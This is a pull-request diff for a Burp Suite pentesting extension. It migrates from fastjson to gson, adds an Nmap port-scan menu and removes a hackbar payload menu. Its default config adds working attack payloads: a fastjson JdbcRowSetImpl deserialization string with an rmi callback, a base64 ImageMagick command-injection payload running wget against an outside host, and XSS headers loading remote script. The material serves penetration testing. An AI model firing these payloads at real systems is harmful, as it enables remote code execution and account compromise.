Merge pull request #18 from bit4woo/dev

ready to release v1.7

README-zh.md

@@ -54,13 +54,13 @@
 
    ![openwithbrowser](img/openwithbrowser.gif)
 
-5. hackbar++
+5. Custom Payload
 
-   该菜单集成了 [Hackbar](https://github.com/d3vilbug/HackBar) ，可以在当前请求中插入payload进行手动测试。
-
-   该菜单最主要的改进是：可以配置自己常用的payload，配置后可以在hackbar++的custom payload中看到。
-
-   另外，payload的值中可以包含2个变量：分别是%host和%DNSlogServer，会在使用payload时使用对应的值替换。
+   可以在配置中自定义个人的常用payload。
+   
+   Config_Custom_Payload：字符串格式的payload，payload的值中可以包含2个变量：分别是%host和%DNSlogServer，会在使用payload时使用对应的值替换。
+   
+   Config_Custom_Payload_Base64：base64格式的payload，当payload包含换行等特殊字符，或者是二进制文件等格式，可以先将内容转换成base64格式然后设置。
 
    ![insertpayload](img/insertpayload.gif)
 

README.md

@@ -24,15 +24,15 @@ A extension that add some small function[ one key to update cookie, one key add
 
 3. update header
 
-  update Header that likes token,authorization .
+   update Header that likes token,authorization .
 
 4. open with browser
 
-  open URL of current request or selected URL with browser you configured.
+   open URL of current request or selected URL with browser you configured.
 
-5. hackbar++
+5. Custom Payload
 
-   insert payload of [Hackbar](https://github.com/d3vilbug/HackBar) or self-configured to current request
+   you can config your own payloads with string or base64 formate.
 
 6. Set Cookie
    scenes: when you visit a website with IP address, It may not contains cookie, but you know it should contains same cookie with some site. you can use this function in Proxy. It will edit response to set the same cookie to let whole web site use the specified cookie.

pom.xml

@@ -6,7 +6,7 @@
 	</properties>
 	<modelVersion>4.0.0</modelVersion>
 	<groupId>com.bit4woo.burp</groupId>
-	<version>1.6</version>
+	<version>1.7</version>
 
 	<repositories>
 		<repository>
@@ -67,7 +67,7 @@
 			<artifactId>burp-extender-api</artifactId>
 			<version>1.7.22</version>
 		</dependency>
-		
+
 		<!-- https://github.com/bit4woo/burp-api-common -->
 		<dependency>
 			<groupId>com.github.bit4woo</groupId>
@@ -80,11 +80,11 @@
 			</dependency> -->
 
 
-		<!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
+		<!-- https://mvnrepository.com/artifact/com.google.code.gson/gson -->
 		<dependency>
-			<groupId>com.alibaba</groupId>
-			<artifactId>fastjson</artifactId>
-			<version>1.2.62</version>
+			<groupId>com.google.code.gson</groupId>
+			<artifactId>gson</artifactId>
+			<version>2.8.6</version>
 		</dependency>
 
 		<!-- Files -->

src/burp/BurpExtender.java

@@ -13,10 +13,9 @@
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
 
-import javax.swing.JMenu;
 import javax.swing.JMenuItem;
 
-import com.alibaba.fastjson.JSON;
+import com.google.gson.Gson;
 
 import U2C.JSONBeautifier;
 import U2C.U2CTab;
@@ -25,25 +24,16 @@
 import config.ConfigTable;
 import config.ConfigTableModel;
 import config.GUI;
-import hackbar.File_Payload_Menu;
-import hackbar.LFI_Menu;
-import hackbar.Reverse_Shell_Menu;
-import hackbar.SQL_Error;
-import hackbar.SQL_Menu;
-import hackbar.SQli_LoginBypass;
-import hackbar.SSTI_Menu;
-import hackbar.WebShell_Menu;
-import hackbar.XSS_Menu;
-import hackbar.XXE_Menu;
 import knife.AddHostToScopeMenu;
 import knife.ChunkedEncodingMenu;
 import knife.CookieUtils;
+import knife.Custom_Payload_Menu;
 import knife.DismissMenu;
-import knife.DoActiveScanMenu;
+import knife.DoPortScanMenu;
 import knife.HeaderEntry;
 import knife.InsertXSSMenu;
 import knife.OpenWithBrowserMenu;
-import knife.RunSQLMap;
+import knife.RunSQLMapMenu;
 import knife.SetCookieMenu;
 import knife.SetCookieWithHistoryMenu;
 import knife.UpdateCookieMenu;
@@ -80,10 +70,10 @@ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) {
 
 		String content = callbacks.loadExtensionSetting("knifeconfig");
 		if (content!=null) {
-			config = JSON.parseObject(content, Config.class);
+			config = new Gson().fromJson(content, Config.class);
 			showToUI(config);
 		}else {
-			showToUI(JSON.parseObject(initConfig(), Config.class));
+			showToUI(new Gson().fromJson(initConfig(), Config.class));
 		}
 		table.setupTypeColumn();//call this function must after table data loaded !!!!
 
@@ -132,22 +122,24 @@ public List<JMenuItem> createMenuItems(IContextMenuInvocation invocation) {
 
 		byte context = invocation.getInvocationContext();
 
-		String dismissed  = this.tableModel.getConfigByKey("DismissedHost");
+		String dismissed  = this.tableModel.getConfigValueByKey("DismissedHost");
 		if (dismissed != null) {
 			menu_list.add(new DismissMenu(this));
 		}
 
 		menu_list.add(new AddHostToScopeMenu(this));
-		if (!callbacks.getBurpVersion().toString().startsWith("1.")) {
-			menu_list.add(new DoActiveScanMenu(this));
-		}
+//		if (!callbacks.getBurpVersion().toString().startsWith("1.")) {
+//			menu_list.add(new DoActiveScanMenu(this));
+//		}
+		//2.0后续版本添加了主动扫描选项，移除该菜单；2020.2版本之后
+		menu_list.add(new DoPortScanMenu(this));
 		menu_list.add(new OpenWithBrowserMenu(this));
-		menu_list.add(new RunSQLMap(this));
+		menu_list.add(new RunSQLMapMenu(this));
 		menu_list.add(new ChunkedEncodingMenu(this));
 
 		if (context == IContextMenuInvocation.CONTEXT_MESSAGE_EDITOR_REQUEST) {
 
-			if (this.tableModel.getConfigByKey("XSS-Payload")!=null){
+			if (this.tableModel.getConfigValueByKey("XSS-Payload")!=null){
 				menu_list.add(new InsertXSSMenu(this));
 			}
 
@@ -169,24 +161,7 @@ public List<JMenuItem> createMenuItems(IContextMenuInvocation invocation) {
 			menu_list.add(new SetCookieWithHistoryMenu(this));
 		}
 
-
-		JMenu Hack_Bar_Menu = new JMenu("^_^ Hack Bar++");
-		Hack_Bar_Menu.add(new SQL_Menu(this));
-		Hack_Bar_Menu.add(new SQL_Error(this));
-		Hack_Bar_Menu.add(new SQli_LoginBypass(this));
-
-		Hack_Bar_Menu.add(new XSS_Menu(this));
-		Hack_Bar_Menu.add(new XXE_Menu(this));
-		Hack_Bar_Menu.add(new LFI_Menu(this));//learn from this
-		Hack_Bar_Menu.add(new SSTI_Menu(this));
-
-		Hack_Bar_Menu.add(new WebShell_Menu(this));
-		Hack_Bar_Menu.add(new Reverse_Shell_Menu(this));
-
-		Hack_Bar_Menu.add(new File_Payload_Menu(this));
-		Hack_Bar_Menu.add(new Custom_Payload_Menu(this));
-
-		menu_list.add(Hack_Bar_Menu);
+		menu_list.add(new Custom_Payload_Menu(this));
 		return menu_list;
 	}
 
@@ -323,7 +298,7 @@ public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequ
 							}
 
 							if (value.toLowerCase().contains("%dnslogserver")) {
-								String dnslog = tableModel.getConfigByKey("DNSlogServer");
+								String dnslog = tableModel.getConfigValueByKey("DNSlogServer");
 								Pattern p = Pattern.compile("(?u)%dnslogserver");
 								Matcher m = p.matcher(value);
 
@@ -348,10 +323,10 @@ public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequ
 
 								try {
 									boolean useComment = false;
-									if (this.tableModel.getConfigByKey("Chunked-UseComment") != null) {
+									if (this.tableModel.getConfigValueByKey("Chunked-UseComment") != null) {
 										useComment = true;
 									}
-									String lenStr = this.tableModel.getConfigByKey("Chunked-Length");
+									String lenStr = this.tableModel.getConfigValueByKey("Chunked-Length");
 									int len = 10;
 									if (lenStr != null) {
 										len = Integer.parseInt(lenStr);
@@ -366,8 +341,8 @@ public void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequ
 
 						///proxy function should be here
 						//reference https://support.portswigger.net/customer/portal/questions/17350102-burp-upstream-proxy-settings-and-sethttpservice
-						String proxy = this.tableModel.getConfigByKey("Proxy-ServerList");
-						String mode = this.tableModel.getConfigByKey("Proxy-UseRandomMode");
+						String proxy = this.tableModel.getConfigValueByKey("Proxy-ServerList");
+						String mode = this.tableModel.getConfigValueByKey("Proxy-UseRandomMode");
 
 						if (proxy != null) {//if enable is false, will return null.
 							List<String> proxyList = Arrays.asList(proxy.split(";"));//如果字符串是以;结尾，会被自动丢弃
@@ -431,7 +406,7 @@ public List<String> GetSetCookieHeaders(String cookies){
 	}
 
 	public boolean isDismissedHost(String host){
-		String dissmissed  = tableModel.getConfigByKey("DismissedHost");
+		String dissmissed  = tableModel.getConfigValueByKey("DismissedHost");
 		if (dissmissed == null) return false;//表示配置被禁用了
 		String[] dissmissedHosts = dissmissed.split(",");
 		Iterator<String> it = Arrays.asList(dissmissedHosts).iterator();

src/burp/Methods.java

@@ -1,16 +1,7 @@
-/*
- * To change this license header, choose License Headers in Project Properties.
- * To change this template file, choose Tools | Templates
- * and open the template in the editor.
- */
 package burp;
 
 import java.awt.event.ActionListener;
-import java.io.File;
-import java.io.FileInputStream;
-import java.io.IOException;
 import java.io.UnsupportedEncodingException;
-import java.nio.file.Files;
 import java.util.ArrayList;
 import java.util.Arrays;
 import java.util.List;
@@ -21,10 +12,6 @@
 import javax.swing.JOptionPane;
 import javax.swing.JSeparator;
 
-/**
- *
- * @author abdul.wahab
- */
 public class Methods {
 
     public static JMenu add_MenuItem_and_listener(JMenu menu, String[] itemList, Object actionListener){

src/config/Config.java

@@ -4,9 +4,7 @@
 import java.util.HashMap;
 import java.util.List;
 
-import com.alibaba.fastjson.JSON;
-import com.alibaba.fastjson.JSONObject;
-import com.alibaba.fastjson.annotation.JSONField;
+import com.google.gson.Gson;
 
 import burp.IBurpExtenderCallbacks;
 import knife.HeaderEntry;
@@ -17,8 +15,8 @@ public class Config {
 	private List<String> stringConfigEntries = new ArrayList<String>();// get from configTableModel
 	private int enableStatus = IBurpExtenderCallbacks.TOOL_PROXY;
 	private boolean onlyForScope = true;
-	private HashMap<String,HeaderEntry> setCookieMap = new HashMap<String,HeaderEntry>();
-	private HeaderEntry usedCookie = null;
+	private transient HashMap<String,HeaderEntry> setCookieMap = new HashMap<String,HeaderEntry>();
+	private transient HeaderEntry usedCookie = null;
 
 	Config(){
     	//to resolve "default constructor not found" error
@@ -60,29 +58,28 @@ public void setOnlyForScope(boolean onlyForScope) {
 		this.onlyForScope = onlyForScope;
 	}
 
-	@JSONField(serialize=false)//表明不序列号该字段
+
 	public HashMap<String, HeaderEntry> getSetCookieMap() {
 		return setCookieMap;
 	}
-	@JSONField(serialize=false)//表明不序列号该字段
+
 	public void setSetCookieMap(HashMap<String, HeaderEntry> setCookieMap) {
 		this.setCookieMap = setCookieMap;
 	}
-	@JSONField(serialize=false)//表明不序列号该字段
+
 	public HeaderEntry getUsedCookie() {
 		return usedCookie;
 	}
-	@JSONField(serialize=false)//表明不序列号该字段
+
 	public void setUsedCookie(HeaderEntry usedCookie) {
 		this.usedCookie = usedCookie;
 	}
 
-	@JSONField(serialize=false)//表明不序列号该字段
 	public String ToJson(){//注意函数名称，如果是get set开头，会被认为是Getter和Setter函数，会在序列化过程中被调用。
-		return JSONObject.toJSONString(this);
+		return new Gson().toJson(this);
 	}
 
 	public Config FromJson(String json){//注意函数名称，如果是get set开头，会被认为是Getter和Setter函数，会在序列化过程中被调用。
-		return JSON.parseObject(json, Config.class);
+		return new Gson().fromJson(json, Config.class);
 	}
 }

src/config/ConfigEntry.java

@@ -1,8 +1,6 @@
 package config;
 
-import com.alibaba.fastjson.JSON;
-import com.alibaba.fastjson.JSONObject;
-import com.alibaba.fastjson.annotation.JSONField;
+import com.google.gson.Gson;
 
 public class ConfigEntry {
 
@@ -16,7 +14,8 @@ public class ConfigEntry {
 	public static final String Action_Append_To_header_value = "Action_Append_To_header_value";
 	public static final String Action_Remove_From_Headers = "Action_Remove_From_Headers";
 
-	public static final String Config_Custom_Payload = "Config_Custom_Payload";;
+	public static final String Config_Custom_Payload = "Config_Custom_Payload";
+	public static final String Config_Custom_Payload_Base64 = "Config_Custom_Payload_Base64";
 	public static final String Config_Basic_Variable = "Config_Basic_Variable";
 	public static final String Config_Chunked_Variable = "Config_Chunked_Variable";
 	public static final String Config_Proxy_Variable = "Config_Proxy_Variable";
@@ -81,11 +80,11 @@ public void setEditable(boolean editable) {
 	}
 
 	public String ToJson(){//注意函数名称，如果是get set开头，会被认为是Getter和Setter函数，会在序列化过程中被调用。
-		return JSONObject.toJSONString(this);
+		return new Gson().toJson(this);
 	}
 
 	public ConfigEntry FromJson(String json){//注意函数名称，如果是get set开头，会被认为是Getter和Setter函数，会在序列化过程中被调用。
-		return JSON.parseObject(json, ConfigEntry.class);
+		return new Gson().fromJson(json, ConfigEntry.class);
 	}
 
 }

src/config/ConfigTableModel.java

@@ -31,6 +31,8 @@ public ConfigTableModel(){
 		configEntries.add(new ConfigEntry("SQLMap-SQLMap.py-Path","",ConfigEntry.Config_Basic_Variable,false,false));
 		configEntries.add(new ConfigEntry("SQLMap-Request-File-Path","D:\\sqlmap-request-files",ConfigEntry.Config_Basic_Variable,true,false));
 		configEntries.add(new ConfigEntry("SQLMap-Options","--risk=3 --level=3",ConfigEntry.Config_Basic_Variable,true,false));
+
+		configEntries.add(new ConfigEntry("Nmap-File-Path","D:\\Program Files (x86)\\Nmap\\nmap.exe",ConfigEntry.Config_Basic_Variable,true,false));
 
 		configEntries.add(new ConfigEntry("Chunked-Length", "10",ConfigEntry.Config_Chunked_Variable,true,false));
 		configEntries.add(new ConfigEntry("Chunked-AutoEnable", "",ConfigEntry.Config_Chunked_Variable,false,false));
@@ -48,8 +50,9 @@ public ConfigTableModel(){
 		configEntries.add(new ConfigEntry("User-Agent", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=bit.0y0.link/%host>",ConfigEntry.Action_Append_To_header_value,true));
 		configEntries.add(new ConfigEntry("knife", "'\\\"/><script src=https://bmw.xss.ht></script><img/src=bit.0y0.link/%host>",ConfigEntry.Action_Add_Or_Replace_Header,true));
 
-		configEntries.add(new ConfigEntry("CRLF", "//%0d%0a/http://www.baidu.com",ConfigEntry.Config_Custom_Payload,true));
+		configEntries.add(new ConfigEntry("fastjson", "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://%host.fastjson.test.dnslog.com/evil\",\"autoCommit\":true}",ConfigEntry.Config_Custom_Payload,true));
 
+		configEntries.add(new ConfigEntry("Imagemagick","cHVzaCBncmFwaGljLWNvbnRleHQNCnZpZXdib3ggMCAwIDY0MCA0ODANCmltYWdlIG92ZXIgMCwwIDAsMCAnaHR0cHM6Ly9pbWFnZW1hZ2ljLmJpdC4weTAubGluay94LnBocD94PWB3Z2V0IC1PLSAlcyA+IC9kZXYvbnVsbGAnDQpwb3AgZ3JhcGhpYy1jb250ZXh0",ConfigEntry.Config_Custom_Payload_Base64,true));
 
 	}
 
@@ -76,14 +79,23 @@ public List<ConfigEntry> getConfigByType(String type) {
 	}
 
 
-	public String getConfigByKey(String key) {
+	public String getConfigValueByKey(String key) {
 		for (ConfigEntry entry:configEntries) {
 			if (entry.getKey().equals(key) && entry.isEnable()) {
 				return entry.getValue();
 			}
 		}
 		return null;
 	}
+
+	public String getConfigTypeByKey(String key) {
+		for (ConfigEntry entry:configEntries) {
+			if (entry.getKey().equals(key) && entry.isEnable()) {
+				return entry.getType();
+			}
+		}
+		return null;
+	}
 
 	public void setConfigByKey(String key,String value) {
 		for (ConfigEntry entry:configEntries) {